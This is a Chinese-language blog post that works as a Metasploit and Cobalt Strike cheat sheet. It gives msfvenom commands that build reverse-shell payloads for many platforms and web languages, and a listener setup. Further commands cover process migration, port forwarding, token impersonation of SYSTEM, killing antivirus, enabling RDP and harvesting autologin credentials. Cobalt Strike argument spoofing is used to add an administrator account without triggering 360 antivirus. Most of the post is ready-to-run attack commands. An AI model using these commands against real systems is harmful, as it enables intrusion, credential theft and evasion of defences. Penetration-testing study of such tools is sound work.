MSF基础使用

415 阅读3分钟

本文已参与「新人创作礼」活动.一起开启掘金创作之路。

0x01 msfvenom

1、msf生成木马

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=port -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=port -f macho > shell.machoWeb Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=port -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=port -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=port -f war > shell.war
Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=port -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT= port -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=port -f raw > shell.pl

2、接收反弹会话

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp   //payload视具体情况而定
set LHOST 192.168.192.148
set LPORT 6666
exploit

0X02 进程迁移

1、获取当前进程PID
getuid
2、获取进程列表
ps
3、转移进程
migrate PID
4、杀死进程
kill PID

自动迁移进程
run post/windows/manage/migrate

设置上线自动转移进程
set autorunscript migrate -f

下面是迁移了一个system管理的进程,迁移成功之后我们也是获得了对应的system权限。

0x03 端口转发

portfwd add -l 7777 -p 3389 -r 192.168.189.194
-l 本地监听端口
-r 内网目标的IP
-p 内网目标的端口

将靶机的3389端口转发到我们本地的7777端口

portfwd add -l 7777 -p 3389 -r 192.168.189.194

端口转发成功之后我们就可以使用远程桌面连接本地的7777端口

0x04 设置 Socks5代理

use auxiliary/server/socks_proxy 
jobs   查看socks工作
kill 0

0x05 添加路由

run post/multi/manage/autoroute
run autoroute -p

0x06 令牌窃取

使用模块
use incognito
查看可用token
list_tokens -u
假冒用户身份
impersonate_token "NT AUTHORITY\SYSTEM"

返回原始权限
rev2self

0x07 提权

use post/multi/recon/local_exploit_suggester 查看可以利用的漏洞

0x08 其他

sysinfo 获取系统信息
run post/windows/gather/checkvm        查看目标是否允许在虚拟机
idletime        最近运行的时间
route        查看目录完整网络
getuid        当前用户名
run post/windows/manage/killav        关闭杀毒软件
run post/windows/manage/enable_rdp    开启3389
run post/windows/manage/autoroute    目标子网情况
background    隐藏后台
route add    添加路由
route    print查看
run post/windows/gather/enum_logged_on_users    列举当前有多少用户登录过目标主机
run post/windows/gather/enum_applocations        列举安装在目标主机上
run post/windows/gather/credentials/windows_autologin    抓取自动登录的用户名密码
load espia   screengrab    抓取此时屏幕截图

0x09 MSF&CobaltStrike联动

MSF联动CS

1、msf获得一个会话

2、在CS上设置监听

3、将msf中的会话传到CS中

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set session 1
set lhost 192.168.189.148
set lport 6666
run

4、CS中成功上线

CS联动MSF

1、在msf中设置监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http
set lhost 192.168.189.148
set lport 4444
run

2、在CS中设置监听

3、将CS中的会话派生给MSF

4、选择刚才设置的监听

5、msf成功收到会话

0x10 CobaltStrike argue 参数污染 绕过杀软

使用前提:administrator 或 system权限。执行创建新用户命令,360报毒

使用argue参数污染net1

argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxx
argue   查看污染的参数

用污染的 net1 创建用户,发现创建成功,360也不报毒

#用污染的net1执行敏感操作
execute net1 user test root123 /add
execute net1 localgroup administrators test /add

成功添加用户